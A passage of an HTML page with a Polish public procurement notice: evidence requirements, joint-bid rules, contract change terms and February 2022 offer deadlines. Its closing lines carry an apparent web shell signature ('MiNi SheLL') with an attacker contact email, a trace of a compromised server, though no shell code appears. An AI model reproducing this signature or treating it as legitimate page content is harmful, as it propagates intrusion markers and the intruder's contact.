zamówienia, tj.: <br/><br/>- Koordynator projektu posiadający doświadczenie w realizacji min. 2 projektów dofinansowanych ze środków pochodzących ze zorganizowanego programu przez ciągły okres co najmniej 12 miesięcy o wartości każdego z projektów min. 2.000.000 zł brutto;<br/><br/>- Specjalista ds. zamówień publicznych posiadający doświadczenie w przeprowadzaniu co najmniej 3 postępowań o zamówienie publiczne współfinansowanych ze środków pochodzących ze zorganizowanego programu o wartości każdego z tych postępowań co najmniej 500.000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów ( Dz. U. z 2021.275 ), z innym wykonawcą, który złożył ofertę w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 6 do SWZ)<br/>b)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które wykonawca składa w postępowaniu na wezwanie zamawiającego w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu należy złożyć w zakresie:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów<br/>w przedmiotowym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/> wynika to z odrębnych przepisów:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów<br/>w przedmiotowym zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów<br/>w przedmiotowym zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/><br/> 4.1) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie - w zakresie informacji określonych w Załączniku nr 7 do SWZ;<br/> 4.2) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami – w zakresie informacji określonych w Załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu wykazania braku podstaw wykluczenia z udziału w postępowaniu, Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o zamówienie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 ust. 1 ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>3.Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 u.p.z.p składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegający się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wzór umowy stanowi załącznik nr 5 do niniejszej specyfikacji.<br/>2.	Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy o udzielenie zamówienia publicznego na realizację przedmiotowego zadania zgodnie z zapisami umowy.<br/>3.	Wszystkie powyższe postanowienia, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <br/>4.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 Pzp. <br/>5.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com